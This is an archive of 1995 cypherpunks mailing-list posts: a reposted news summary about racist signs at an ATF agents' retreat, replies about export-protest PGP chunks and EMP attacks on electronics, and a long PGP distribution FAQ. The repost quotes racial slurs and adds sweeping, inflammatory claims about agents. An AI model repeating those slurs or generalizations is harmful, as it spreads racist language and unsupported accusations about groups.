>Header deleted for brevity
>
>> (please re-post)
>>                
>> 		 ATF SUMMER CAMP A HOTBED OF RACIAL HATE
>> 
>> The Washington Times (7/11/95) reports that despite a pending lawsuit 
>> against the ATF for racism, a summer camp for ATF agents called the 
>> "Good O' Boys Roundup" was still awash with racist sentiment. 
>> 
>> All who attended were welcomed at the entrance with many racist signs,
>> including one that read: 
>> 
>>                         "Nigger Check Point" 
>> 
>> The ATF camp maintains a whites only policy. All black ATF agents who
>> attempted to attend were turned away. White agents inside were reportedly
>> "real mad" about the attempts of black agents to attend. That the signs
>> were hung at the entrance indicates that all who attended had no problem
>> with the ATF's promotion of hard-core racism at the retreat. 
>> 
>> There were many T-shirts promoting racial hatred and murder on sale at the
>> ATF summer camp, such as one with a target superimposed over the face of
>> Martin Luther King Jr. It would seem that the ATF approves of the killing
>> of Dr. King. 
>> 
>> Also available at the ATF hate camp were "Nigger Hunting Licenses." 
>> If promoting the murder of black leaders is not bad enough, ATF agents
>> even promote random killings of blacks. 
>> 
>> In a vain attempt to distance the ATF from the promotion of racial hate
>> and murder at the ATF summer camp, ATF spokesman Earl Woodham claimed the
>> event has never been sanctioned by the ATF. However, for years the local 
>> ATF office has been the place to send in registration fees and to call 
>> for info about the ATF summer hate camp. The agents at this office declined
>> to say if they ever attended one of the "round ups" over the years. 
>> 
>> One ATF official said "I am not surprised about the signs or other
activities 
>> [at the camp]."  A former law enforcement officer who has attended the 
>> camp this year and in the past said, "The roundup has been a place for law
>> enforcement personnel to go and let their hair down." So it would seem that
>> hatred and a lust for murdering oppressed people reflects the true nature
>> of these "law enforcement" personnel. "Jack-booted thugs" is soft-balling it.
>> 
>> The pending lawsuit launched by 15 plaintiffs charges that KKK information
>> and "Nigger Hunting Licenses" have been displayed in many ATF offices. The
>> suit also claims widespread racial slurs and harassment by ATF personnel.
>> 
>> All information presented here is derived from The Washington Times
>> (7/11/95) front page article "Racist ways die hard at lawmen's retreat."
>> 
>> PLEASE RE-POST FAR AND WIDE
>> 
>> -- Ian Goddard <igoddard@cap.gwu.edu>
>> 
>> 
>
>
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: alano@teleport.com (Alan Olsen)
Date: Tue, 11 Jul 95 22:05:20 PDT
To: cypherpunks@toad.com
Subject: Re: PGP Anti- ITAR sig
Message-ID: <199507120505.WAA26898@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain



>This is 1/713 of PGP262i DOS Executable Zipfile UUE'd

Collect the entire set!

|     "Ignorance is no excuse for the law."       | alano@teleport.com   |
|"Would you rather be tortured by the government  | Disclaimer:          |
|forces or the people's liberation army?" -mklprc | Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|  Free Tibet! (With two proofs of purchace)      |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Tue, 11 Jul 95 20:29:18 PDT
To: erc@khijol.intele.net (Ed Carp [khijol Sysadmin])
Subject: Re: Don't trust the net too much
In-Reply-To: <Pine.3.89.9507102023.H1184-0100000@khijol>
Message-ID: <199507120328.XAA02985@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain



| > hundered dollars worth of transmitter parts, you can cause transient
| > failures with EMF pulse weapons, and for a bit more, you can fry all
| > the electronics, then drive away before they have any idea that their

| worth of parts.  Could you be more specific?

| > 	Go read Winn Schwartaus book "Information Warfare"  Then go
| > read Sun Tzu.
| 
| I have.  I agree, killing people is dumb, but try telling that to your 

	More specifically, few items sensitive electronic items are
hardened against electromagnetic pulses.  Ever see a speaker interfere
with your TV set?  Build a big enough speaker, and you can screw with
your computers memory.  (Of course, if you just use an electromagnet,
and not bother to build a speaker around it, you'll be much more
energy efficient. :) A big enough pulse can confuse just about any
hardware; bigger pulses still can destroy it.  Directed (or
undirected) pulses are easy to produce with the right amps.

	Again, check out Schwartau; your local library probably has
him.

Adam


-- 
"It is seldom that liberty          I Support The Phil
of any kind is lost all at     Zimmermann legal defense fund
once."               -Hume    http://www.netresponse.com/zldf

------------------ PGP.ZIP Part [001/713] -------------------
M4$L#!!0````(`">9ZQX3(*,_DG8!`-JF`P`'````4$=0+D581>S;=UQ3U__X
M\9M!$E8,TT@PJ$10$1=*41%WW`KX$=Q[M5KK`&R%(HH+(T.M"S>NME8K=31N
M:A$[K+5(K:O5BE405ZE:1"3?UTW`:K_]\/G\?O_^?CX>3^_-S;GGO,^\`^@W
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Tue, 11 Jul 95 21:05:15 PDT
To: cypherpunks@toad.com
Subject: Re: RACIST MILITIA: ATF
Message-ID: <199507120402.AAA11172@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

I'm sure that this will be widely covered in the media.

_NOT_!

[Prediction: *Gentle* wrist slaps, *nobody* fired, promotions.]

Also, are there any C-punks in south Florida right now (besides me)?
If so, please respond by private e-mail. Thanks.

Regards,
JMR


- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMANHyG1lp8bpvW01AQFUBgP/cNxu8ead5MBGtggEwR/80a0DmA1fUgmy
X2xJpXCu7NUGT2rPZR9jni1guBOVHKypC6ZsaW3jDpaENX/l/2YxrE6nakVKR9qm
ae46QZC23Lm155ieOOBT8V50MglkWuYhgDf9+w/JxmS11R26pYNezgzuqNsLCGdg
6hq7WK6+t8c=
=S2pc
- -----END PGP SIGNATURE-----

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMANJJioZzwIn1bdtAQE53QGAoOMNWiua7qQp7OD5g8Ok8WsX4EnPtjL3
jU6ONKYHJrhBnNAMPn7z67B/NeGevq5Q
=/U9Z
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Paul Johnson <mpj@netcom.com>
Date: Wed, 12 Jul 95 00:25:29 PDT
To: Where to get PGP list <viacrypt@acm.org
Subject: Where to get the latest PGP
Message-ID: <Pine.SUN.3.91.950712002231.6230A-100000@netcom20>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

WHERE TO GET THE PRETTY GOOD PRIVACY PROGRAM (PGP) FAQ 12 JULY 1995

(Long version)


WHAT IS THE LATEST VERSION OF PGP?
BUG
WHERE CAN I GET VIACRYPT PGP?
WHERE CAN I FTP PGP IN NORTH AMERICA?
WHERE IS PGP ON THE WORLD WIDE WEB?
WHERE IS PGP ON COMPUSERVE?
AOL
WHAT BULLETIN BOARD SYSTEMS CARRY PGP?
WHERE CAN I FTP PGP CLOSE TO ME?
HOW CAN I GET PGP BY EMAIL?
WHERE IS MACPGP?
WHERE IS VAX PGP?
WHERE CAN I GET MORE PGP INFORMATION?
WHAT ARE SOME GOOD PGP BOOKS?
WHERE CAN I GET PGP LANGUAGE MODULES?
IS PGP LEGAL?
WHAT IS PHILIP ZIMMERMANN'S LEGAL STATUS?
WHERE CAN I GET WINDOWS & DOS SHELLS FOR PGP?
WHERE CAN I GET THE MACPGP KIT?
WHERE IS THE PGP 3.0 API DRAFT?
WHAT OTHER FILE ENCRYPTION (DOS, MAC) TOOLS ARE THERE?
HOW DO I SECURELY DELETE FILES (DOS)?
WHAT DO I DO ABOUT THE PASS PHRASE IN MY WINDOWS SWAP FILE?
WHAT EVER HAPPENED TO PGPfone(tm)?
WHERE DO I GET NAUTILUS?
HOW DO I ENCRYPT MY DISK ON-THE-FLY?
WHERE IS PGP'S COMPETION?
HOW DO I PUBLISH MY PGP PUBLIC KEY?
WHICH FAQ IS THE OFFICIAL ONE?
CAN I COPY AND REDISTRIBUTE THIS FAQ?

For questions not covered here, please see the MAIN alt.security.pgp FAQ at
ftp://ftp.prairienet.org/pub/providers/pgp/pgpfaq.txt


WHAT IS THE LATEST VERSION OF PGP?


Platform(s)       Latest Version        Distribution File Names
__________________________________________________________________________
|                |                     |                                 |
|DOS, Unix,      | Viacrypt PGP 2.7.1  | disk sets                       |
|Mac, Windows,   |                     |                                 |
|or WinCIM/CSNav |                     |                                 |
|________________|_____________________|_________________________________|
|                |                     |                                 |
|Hardware-based  | Viacrypt 2.7.1      | disk sets                       |
|PGP/Token       |                     |                                 |
|________________|_____________________|_________________________________|
|                |                     |                                 |
|DOS, Unix, VAX, | MIT PGP 2.6.2       | pgp262.zip  (DOS + docs)        |
|others          |                     | pgp262s.zip (source)            |
|                |                     | pg262s.zip source on CompuServe |
|                |                     | pgp262s.tar.gz (source)         |
|                |                     | pgp262s.tar.Z (source)          |
|                |                     | pgp262dc.zip (documentation)    |
|                |                     | pg262d.zip (docs on CompuServe) |
|________________|_____________________|_________________________________|
|                |                     |                                 |
|Macintosh       | MIT PGP 2.6.2       | MacPGP2.6.2-130v1.hqx           |
|                | Mac version 1.3.0   | m262pgp.hqx (same as above)     |
|                |                     | MacPGP2.6.2-130v1.source.asc    |
|                |                     | m262pgps.asc (same as above)    |
|________________|_____________________|_________________________________|
|                |                     |                                 |
|Power Mac       | Zbigniew's "beta"   | Fatmacpgp262b131.sea.hqx        |
|                |                     | f262pgp.hqx (same as above)     |
|                |                     | Fatmacpgp262b131.src.hqx        |
|                |                     | f262pgps.hqx (same as above)    |
|________________|_____________________|_________________________________|
|                |                     |                                 |
|Amiga           | PGP 2.6.2 Amiga 1.4 | pgp262-a14-000.lha              |
|                |                     | pgp262-a14-020.lha              |
|                |                     | pgp262-a14-src.lha              |
|                |                     | PGPAmi262is.lha (international) |
|________________|_____________________|_________________________________|
|                |                     |                                 |
|Atari           | Atari MIT PGP 2.6.2 | pgp262st.zip                    |
|                | Atari International | pgp262ib.zip                    |
|________________|_____________________|_________________________________|
|                |                     |                                 |
|OS/2            | MIT PGP 2.6.2       | pgp262-os2.zip                  |
|                |                     | on ftp.gibbon.com               |
|________________|_____________________|_________________________________|
|                |                     |                                 |
|Non-USA version | PGP 2.6.2i from     | pgp262i.zip                     |
|to avoid RSAREF | Stale Schumacher    | pgp262is.zip                    |
|license.        |                     | pgp262is.tar.gz                 |
|                |                     | pgp262i-os2.zip                 |
|                |                     | pgp262i-djgpp.zip               |
|                |                     |                                 |
|                | Canadian "mutant"   | MacPGP262ca124.exe.sea.hqx      |
|                | not for USA use     | MacPGP262ca124.src.sea.hqx      |
|________________|_____________________|_________________________________|



BUG
Digital signatures made with keys 2034-2048 bits in length may
be corrupt if made by any version of PGP released prior to May
1995.  To fix this in the source code, change the line in
function make_signature_certificate in crypto.c from

byte inbuf[MAX_BYTE_PRECISION], outbuf[MAX_BYTE_PRECISION];
to
byte inbuf[MAX_BYTE_PRECISION], outbuf[MAX_BYTE_PRECISION+2];


WHERE CAN I GET VIACRYPT PGP?

Viacrypt has versions of PGP complete with licenses for
commercial use of the RSA and IDEA encryption algorithms.
Viacrypt PGP comes in executable code only (no source code),
but it is based on (and just as secure as) the freeware PGP.
Viacrypt PGP for Windows is the only real Windows PGP (and even
it is partially a quickwin executable that looks like a DOS
port).  Still, it is much better from an interface standpoint
than all the others.

Please contact ViaCrypt for pricing (about $100 up), the latest
platforms, and availablity at 800-536-2664 8:30am to 5:00pm
MST, Monday - Friday.  They accept VISA, MasterCard, AMEX and
Discover credit cards.

If you have further questions, please ask:

Paul E. Uhlhorn
Director of Marketing, ViaCrypt Products
Mail:          9033 N. 24th Avenue
Suite 7
Phoenix AZ 85021-2847
Phone:         (602) 944-0773
Fax:           (602) 943-2601
Internet:      viacrypt@acm.org
Compuserve:    70304.41


WHERE CAN I FTP PGP IN NORTH AMERICA?

If you are in the USA or Canada, you can get PGP by following the
instructions in any of:

ftp://net-dist.mit.edu/pub/PGP/README
ftp://ftp.csn.net/mpj/README.MPJ
ftp://miyako.dorm.duke.edu/pub/GETTING_ACCESS
ftp://ftp.netcom.com/pub/mp/mpj/README.MPJ
ftp://ftp.netcom.com/pub/dd/ddt/crypto/READ_ME_FIRST!
ftp://ftp.netcom.com/pub/dd/ddt/crypto/pgp_ftp_instructions.txt
ftp://ftp.eff.org

Follow the instructions found in README.Dist that you get from one of:

ftp://ftp.eff.org/pub/Net_info/Tools/Crypto/README.Dist
gopher.eff.org, 1/Net_info/Tools/Crypto
gopher://gopher.eff.org/11/Net_info/Tools/Crypto
http://www.eff.org/pub/Net_info/Tools/Crypto/
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/pgp/
ftp://ftp.gibbon.com/pub/pgp/README.PGP
(OS/2 users see also /pub/gcp/gcppgp10.zip)
ftp://ftp.wimsey.bc.ca/pub/crypto/software/README


WHERE IS PGP ON THE WORLD WIDE WEB?

http://web.mit.edu/network/pgp-form.html
http://www.ifi.uio.no/~staalesc/PGP/home.html
http://rschp2.anu.edu.au:8080/crypt.html
http://www.eff.org/pub/Net_info/Tools/Crypto/
http://community.net/community/all/home/solano/sbaldwin
http://www.cco.caltech.edu/~rknop/amiga_pgp26.html
http://www.csua.berkeley.edu/cypherpunks/home.html
http://www.leo.org/archive/os2/crypt/
http://colossus.net/wepinsto/wshome.html


WHERE IS PGP ON COMPUSERVE?

GO NCSAFORUM.  Follow the instructions there to gain access to
Library 12: Export Controlled.

Compuserve file names are limited, so look for PGP262.ZIP,
PG262S.ZIP (source code), PGP262.GZ (Unix source code) and
PG262D.ZIP (documentation only).


AOL

Go to the AOL software library and search "PGP" or ftp from

ftp://ftp.csua.berkeley.edu/pub/cypherpunks/pgp.


WHAT BULLETIN BOARD SYSTEMS CARRY PGP?

MANY BBS carry PGP.  The following carry recent versions of PGP
and allow free downloads of PGP.

USA

303-343-4053 Hacker's Haven, Denver, CO Lots of crypto stuff here.
303-772-1062 Colorado Catacombs BBS, Longmont CO
8 data bits, 1 stop, no parity, up to 28,800 bps.
Use ANSI terminal emulation.
For free access: log in with your own name, answer the questions.
303-914-0031 The FreeMatrix ]I[
314-896-9309 The KATN BBS
317-791-9617 Computer Virus Research Center (CVRC) BBS, Indianapolis, IN
Login Name: PGP USER  Password: PGP
501-791-0124, 501-791-0125 The Ferret BBS, North Little Rock, AR
Login name: PGP USER  Password: PGP
508-668-4441 Emerald City, Walpole, MA
601-582-5748 CyberGold BBS
612-690-5556, !CyBERteCH SeCURitY BBS! Minneapolis MN, - write a letter
to the sysop requesting full access.
914-667-4567 Exec-Net, New York, NY
915-587-7888, Self-Governor Information Resource, El Paso, Texas

UK

01273-688888

GERMANY

+49-781-38807 MAUS BBS, Offenburg - angeschlossen an das MausNet
+49-521-68000 BIONIC-BBS Login: PGP


WHERE CAN I FTP PGP CLOSE TO ME?

AU

ftp://ftp.cc.adfa.oz.au/pub/security/pgp23/macpgp2.3.cpt.hqx
ftp://ftp.iinet.net.au:mirrors/pgp (Australia ONLY)
ftp://plaza.aarnet.edu.au/micros/mac/umich/misc/documentation/howtomacpgp2.7.txt

DE

ftp://ftp.informatik.tu-muenchen.de/pub/comp/os/os2/crypt
ftp://ftp.informatik.uni-hamburg.de/pub/virus/crypt/pgp
ftp://ftp.fu-berlin.de/mac/sys/init/MacPGP2.6uiV1.2en.cpt.hqx.gz
ftp://ftp.tu-clausthal.de/pub/atari/misc/pgp/pgp261b.lzh
ftp://ftp.uni-kl.de/pub/aminet/util/crypt
ftp://ftp.uni-paderborn.de/pub/aminet/util/crypt
ftp://ftp.westfalen.de/pd/Atari/Pgp  (Atari)
ftp://tupac-amaru.informatik.rwth-aachen.de

ES

ftp://goya.dit.upm.es

IT

ftp://ftp.dsi.unimi.it/pub/security/crypt/PGP

FI

ftp://ftp.funet.fi/pub/crypt

NL

ftp://ftp.nl.net/pub/crypto/pgp
ftp.nic.surfnet.nl/surfnet/net-security/encryption/pgp

NZ

ftp://kauri.vuw.ac.nz
ftp://rs950.phys.waikato.ac.nz/pub/incoming/pgp (New Zealand ONLY)

SE

ftp://leif.thep.lu.se

TW

ftp://nctuccca.edu.tw/PC/wuarchive/pgp/

UK

ftp://ftp.demon.co.uk/pub/amiga/pgp
ftp://ftp.ox.ac.uk/pub/crypto/pgp
ftp://src.doc.ic.ac.uk/aminet/amiga-boing
ftp://unix.hensa.ac.uk/pub/uunet/pub/security/virus/crypt/pgp

USA

ftp://atari.archive.umich.edu/pub/atari/Utilities/pgp261st.zip (Atari)
ftp://ftp.leo.org/pub/comp/os/os2/crypt
ftp://wuarchive.wustl.edu/pub/aminet/util/crypt
ftp://ftp.netcom.com/pub/gr/grady/PGP_NOT_FOR_EXPORT/MacPGP262ca124.exe.sea.hqx
ftp://ftp.netcom.com/pub/gr/grady/PGP_NOT_FOR_EXPORT/MacPGP262ca124.src.sea.hqx

ZA

ftp://ftp.ee.und.ac.za/pub/crypto/pgp
/pub/archimedes
/pub/pgp
/pub/mac/MacPGP


HOW CAN I GET PGP BY EMAIL?

If you have access to email, but not to ftp, send a message
saying "help" to
ftpmail@decwrl.dec.com,
mailserv@nic.funet.fi, or
ftp-request@netcom.com

To get pgp 2.6.2i by email:

Send a message to hypnotech-request@ifi.uio.no with your request in the
Subject: field.

Subject              What you will get

GET pgp262i.zip      MS-DOS executable (uuencoded)
GET pgp262is.zip     MS-DOS source code (uuencoded)
GET pgp262is.tar.gz  UNIX source code (uuencoded)


For FAQ information, send e-mail to

mail-server@rtfm.mit.edu with
send usenet/news.answers/ftp-list/faq
in the body of the message.


WHERE IS MACPGP?

ftp://ftp.csn.net/mpj/README.MPJ
ftp://ftp.confusion.net/pub/pgp/mac-pgp/README
ftp://highway.alinc.com/users/jordyn/mac-pgp/README
ftp://miyako.dorm.duke.edu/pub/GETTING_ACCESS


WHERE IS VAX PGP?

Get the full PGP distribution, then get VAXPGP262.TAR.Z from
the berkeley site for additional files needed to compile PGP
for the VAX and a precompiled version for VAX/VMS 5.5-2.


WHERE CAN I GET MORE PGP INFORMATION?

ftp://ftp.prairienet.org/pub/providers/pgp/pgpfaq.txt
ftp://starfire.ne.uiuc.edu/preston/pgpquick.ps (and pgpquick.doc)
http://www.prairienet.org/~jalicqui/
http://www.mit.edu:8001/people/warlord/pgp-faq.html
http://draco.centerline.com:8080/~franl/crypto.html
http://draco.centerline.com:8080/~franl/pgp/bug0.html
http://www.eff.org/pub/EFF/Issues/Crypto/ITAR_export/cryptusa_paper.ps.gz
http://www.eff.org/pub/EFF/Issues/Crypto/ITAR_export/cryptusa.paper
http://www.cco.caltech.edu/~rknop/amiga_pgp26.html
Email
pgp-help@hks.net
ftp://ds.internic.net/internet-drafts/draft-pgp-pgpformat-00.txt
ftp://ds.internic.net/internet-drafts/draft-ietf-pem-mime-08.txt
http://www.cis.ohio-state.edu/
ftp://ftp.csn.net/mpj/public/pgp/MacPGP262_manual.sit.hqx
http://www-mitpress.mit.edu/mitp/recent-books/comp/pgp-source.html
http://web.cnam.fr/Network/Crypto/ (c'est en Francais)
http://web.cnam.fr/Network/Crypto/survey.html (en Anglais)
http://www2.hawaii.edu/~phinely/MacPGP-and-AppleScript-FAQ.html
ftp://ftp.prairienet.org/pub/providers/pgp/pgpbg11.asc (Beginner's Guide)
Beginner's Guide: send email to
slutsky@lipschitz.sfasu.edu, subject: bg2pgp


WHAT ARE SOME GOOD PGP BOOKS?

Protect Your Privacy: A Guide for PGP Users
by William Stallings
Prentice Hall PTR
ISBN 0-13-185596-4
US $19.95
This is a good technical manual for PGP for most users, and makes a better
reference than the "official" documentation that comes with PGP.  I recommend
it highly.

PGP: Pretty Good Privacy
by Simson Garfinkel
O'Reilly & Associates, Inc.
ISBN 1-56592-098-8
US $24.95

E-Mail Security: How to Keep Your Electronic Mail Private
"Covers PGP/PEM"
by Bruce Schneier
Wiley Publishing

The Computer Privacy Handbook: A Practical Guide to E-Mail Encryption, Data
Protection, and PGP PRivacy Software
by Andre Bacard
Peachpit Press
ISBN 1-56609-171-3
US$24.95
800-283-9444 or 510-548-4393

This is an interesting book on the sociology and politics of privacy in the
computer age as well as a practical manual on using PGP.  Must reading for
all members of Congress, presidential staff, members of Parliament, and
ordinary citizens who would like to take reasonable steps to protect
themselves from some forms of crime that have been made easy by technology.


THE OFFICIAL PGP USER'S GUIDE
by Philip R. Zimmerman
MIT Press
April 1995 - 216 pp. - paper - $14.95(US) - ISBN 0-262-74017-6 ZIMPP
Standard PGP documentation neatly typeset and bound.

PGP SOURCE CODE AND INTERNALS
by Philip R. Zimmerman
April 1995 - 804 pp. -
$55.00(US) - 0-262-24039-4 ZIMPH
This is a handy printed reference with commented source code for PGP 2.6.2
with great educational value.  This is a great way to study some of the
computer science and information theory behind the world's best email privacy
tool without having either a computer or reams of printouts handy.
Recommended reading on long airline flights for serious students of computer
science and computer security.

Ordering information for the last two books:
Call US Toll Free 1-800-356-0343 or 617-625-8569.
Cite code 5CSC and number 661.
Allow 4-6 weeks for delivery within North America.
Allow 8-12 weeks for delivery outside of North America.

How to Use PGP, 61 pages,  (Pub #121) from the Superior Broadcasting Company,
Box 1533-N, Oil City, PA 16301, phone: (814) 678-8801 (about $10-$13).


WHERE CAN I GET PGP LANGUAGE MODULES?

These are suitable for most PGP versions.

http://www.ifi.uio.no/~staalesc/PGP/language.html
German

ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp23_german.txt
ftp://ftp.csn.net/mpj/public/pgp/pgp_german.txt
ftp://ftp.csn.net/mpj/public/pgp/PGP_german_docs.lha
ftp://ftp.informatik.uni-hamburg.de:/pub/virus/crypt/pgp/language/pgp_german.asc
ftp://ftp.leo.org/pub/comp/os/os2/crypt/pgp262i-german.zip

Italian

ftp://ftp.dsi.unimi.it/pub/security/crypt/PGP/pgp-lang.italian.tar.gz
ftp://ftp.funet.fi/pub/crypt/ghost.dsi.unimi.it/PGP/pgp-lang.italian.tar.gz
ftp://ftp.csn.net/mpj/public/pgp/pgp-lang.italian.tar.gz

Japanese

ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp23_japanese.tar.gz
ftp://ftp.csn.net/mpj/public/pgp/pgp-msgs-japanese.tar.gz

Lithuanian

ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp23_lithuanian.zip
ftp://ftp.csn.net/mpj/public/pgp/pgp23ltk.zip

Norwegian

ftp://ftp.ox.ac.uk/pub/crypto/pgp/languate/pgp23_norwegian.tar.gz
ftp://ftp.ox.ac.uk/pub/crypto/pgp/languate/pgp26i_norwegian.zip

Romanian

ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp26_romanian.tar.gz
ftp://ftp.encomix.es/pub/pgp/lang/pgp-romanian.zip
http://www.info.polymtl.ca/zuse/tavi/www/archive/ro_2.6.2.zip
http://www.info.polymtl.ca/zuse/tavi/www/archive/language.txt

Russian

ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp26_russian.zip
ftp://ftp.kiae.su/unix/crypto/pgp/pgp26ru.zip
ftp://ftp.csn.net/mpj/public/pgp/pgp26ru.zip

Spanish

ftp://ftp.dsi.unimi.it/pub/security/crypt/PGP/pgp-lang.spanish.tar.gz
ftp://ftp.funet.fi/pub/crypt/ghost.dsi.unimi.it/pgp-lang.spanish.tar.gz
ftp://ftp.csn.net/mpj/public/pgp/pgp-lang.spanish.tar.gz

Swedish

ftp://ftp.ox.ac.uk/pub/crypto/pgp/language/pgp23_swedish.txt
ftp://ftp.csn.net/mpj/public/pgp/pgp_swedish.txt


IS PGP LEGAL?

Pretty Good Privacy is legal if you follow these rules:

Don't export PGP from the USA except to Canada, or from
Canada except to the USA, without a license.

If you are in the USA, use either Viacrypt PGP (licensed
for commercial use) or MIT PGP using RSAREF (limited to
personal, noncommercial use).  Outside of the USA, where
RSA is not patented, you may prefer to use a version of
PGP (2.6.i) that doesn't use RSAREF to avoid the
restrictions of that license.

If you are in a country where the IDEA cipher patent
holds in software (including the USA, Canada, and some
countries in Europe), make sure you are licensed to use
the IDEA cipher commercially before using PGP
commercially.  (No separate license is required to use
the freeware PGP for personal, noncommercial use).  For
direct IDEA licensing, contact Ascom Systec.

Ascom Systec has taken over the distribution of IDEA
licenses effective April 1, 1995. Erhard Widmer is the
person responsible for the sales aspects, and Peter
Hartmann is responsible for the technical aspects. They
can be reached as follows:


Erhard Widmer,  Ascom Systec AG, Dep't. CMVV      Phone  ++41 64 56 59 83
Peter Hartmann, Ascom Systec AG, Dep't. CMN       Phone  ++41 64 56 59 45

Fax:            ++41 64 56 59 90
e-mail:         IDEA@ascom.ch
Mail address:   Gewerbepark, CH-5506 Maegenwil (Switzerland)

Don't sell PGP based on Philip Zimmermann's source code in
North America unless you are reselling for Viacrypt (because
they have an exclusive marketing agreement on Philip
Zimmermann's copyrighted code). (Selling shareware/freeware
disks or connect time is OK).  This restriction might be
lifted with PGP 3.0, since it is a complete rewrite by Colin
Plumb.  Distribution and use restrictions on that version are
still to be determined.

If you modify PGP (other than porting it to another platform
or adapting it to another compiler), don't call it PGP (TM)
or Pretty Good Privacy (TM) without Philip Zimmermann's
permission.


WHAT IS PHILIP ZIMMERMANN'S LEGAL STATUS?

Philip Zimmermann is under investigation for alledged violation
of export regulations, with a grand jury hearing evidence.
There is speculation that the Feds are trying to make an
example of Phil by with prolonged and expensive legal
proceedings, thus reaping a reward of Fear, Uncertainty, and
Doubt to discourage development and use of strong crypto in the
USA.

Even though people in this country are considered innocent
until proven guilty, there is a problem with the system in that
it can take lots of money for innocent folks to defend
themselves.  Because of the broad implications for freedom,
privacy, and the First Amendment of the U. S. Constitution in
this case, I implore all of you who can to help out with Phil's
rather significant legal and travel expenses involved in his
defense.  Phil is a nice guy with a wife and two children to
support, and he has done a great deal in his PGP social
activism to help all of us.

To send a check or money order by mail, make it payable, NOT to
Phil Zimmermann, but to "Philip L. Dubois, Attorney Trust
Account."  Mail the check or money order to the following
address:

Philip Dubois
2305 Broadway
Boulder, CO USA 80304
(Phone #: 303-444-3885)

To send a wire transfer, your bank will need the following
information:

Bank: VectraBank
Routing #: 107004365
Account #: 0113830
Account Name: "Philip L. Dubois, Attorney Trust Account"

To contribute using your credit card (secured with PGP), simply
compose a message in plain ASCII text giving the following: the
recipient ("Philip L.  Dubois, Attorney Trust Account"); the
bank name of your VISA or MasterCard; the name which appears on
it (yours, hopefully :-)); a telephone number at which you can
be reached in case of problems; the card number; date of
expiry; and, most important, the amount you wish to donate.
(Make this last item as large as possible.) Then use PGP to
encrypt and ASCII-armor the message using Phil Dubois's public
key, distributed with PGP 2.6.2.  E-mail the output file to
Phil Dubois (dubois@csn.org).
Please be sure to use a "Subject:" line reading something like
"Phil Zimmermann Defense Fund" so he'll know to decrypt it
right away.


WHERE CAN I GET WINDOWS & DOS SHELLS FOR PGP?

http://www.ifi.uio.no/~staalesc/AutoPGP.html
ftp://oak.oakland.edu/SimTel/msdos/security/apgp22b.zip
ftp://oak.oakland.edu/SimTel/win3/security/pgpw40.zip
http://alpha.netaccess.on.ca/~spowell/crypto/pwf31.zip
ftp://ftp.netcom.com/pub/dc/dcosenza/pgpw40.zip
ftp://Sable.ox.ac.uk/pub
ftp://ftp.firstnet.net/pub/windows/winpgp/pgpw40.zip  <WinPGP's home site>
http://www.firstnet.net/~cwgeib/welcom.html
ftp://ftp.netcom.com/pub/ec/ecarp/pgpwind.zip
http://www.eskimo.com/~joelm (Private Idaho)
ftp://ftp.eskimo.com/~joelm
http://www.xs4all.nl/~paulwag/security.htm
http://www.LCS.com/winpgp.html
ftp://mirrors.aol.com/mir01/circa/pub/pc/win3/util/pwf31.zip
http://netaccess.on.ca/~rbarclay/index.html
http://netaccess.on.ca/~rbarclay/pgp.html
ftp://ftp.leo.org/pub/comp/os/os2/crypt/gcppgp10.zip
ftp://ftp.leo.org/pub/comp/os/os2/crypt/pmpgp.zip

Compuserve:
Library 3, European Forum.
Library 6, NCSA Forum
PCWorld Online Forum.
WUGNET Forum.
WinShare Forum

See also the BBS list for PGP, above.


WHERE CAN I GET THE MACPGP KIT?

ftp://duke.bwh.harvard.edu:/pub/adam/mcip/MacPGP_icons.sit.hqx
ftp://duke.bwh.harvard.edu:/pub/adam/mcip/MacPGPkit.hqx
ftp://duke.bwh.harvard.edu:/pub/adam/mcip/MacPGPkitSources.sit.hqx
ftp://ftp.netcom.com/pub/dd/ddt/crypto/pgp_tools/MacPGPkit1.6.sit

OTHER MAC ADD-ONS

ftp://ftp.netcom.com/pub/dd/ddt/crypto/pgp_tools/ChainMail.0.7.sit
ftp://ftp.netcom.com/pub/dd/ddt/crypto/pgp_tools/Eudora->PGP Scripts1.5.sit
ftp://ftp.csn.net/mpj/I_will_not_export/crypto_???????/pgp/mac/AppleScripts


WHERE IS THE PGP 3.0 API DRAFT?

The (prelim. draft) PGP 3.0 API is at:

ftp://ftp.netcom.com/pub/dd/ddt/crypto/crypto_info/950212 pgp3spec.txt
All comments on it for the PGP 3.0 API Team should be sent to:
pgp@lsd.com


WHAT OTHER FILE ENCRYPTION (DOS, MAC) TOOLS ARE THERE?

PGP can do conventional encryption only of a file (-c) option,
but you might want to investigate some of the other
alternatives if you do this a lot.  Alternatives include
Quicrypt and Atbash2 for DOS, DLOCK for DOS & UNIX, Curve
Encrypt (for the Mac), HPACK (many platforms), and a few
others.

Quicrypt is interesting in that it comes in two flavors:
shareware exportable and registered secure.  Atbash2 is
interesting in that it generates ciphertext that can be read
over the telephone or sent by Morse code.  DLOCK is a no-frills
strong encryption program with complete source code.  Curve
Encrypt has certain user-friendliness advantages.  HPACK is an
archiver (like ZIP or ARC), but with strong encryption.

A couple of starting points for your search are:

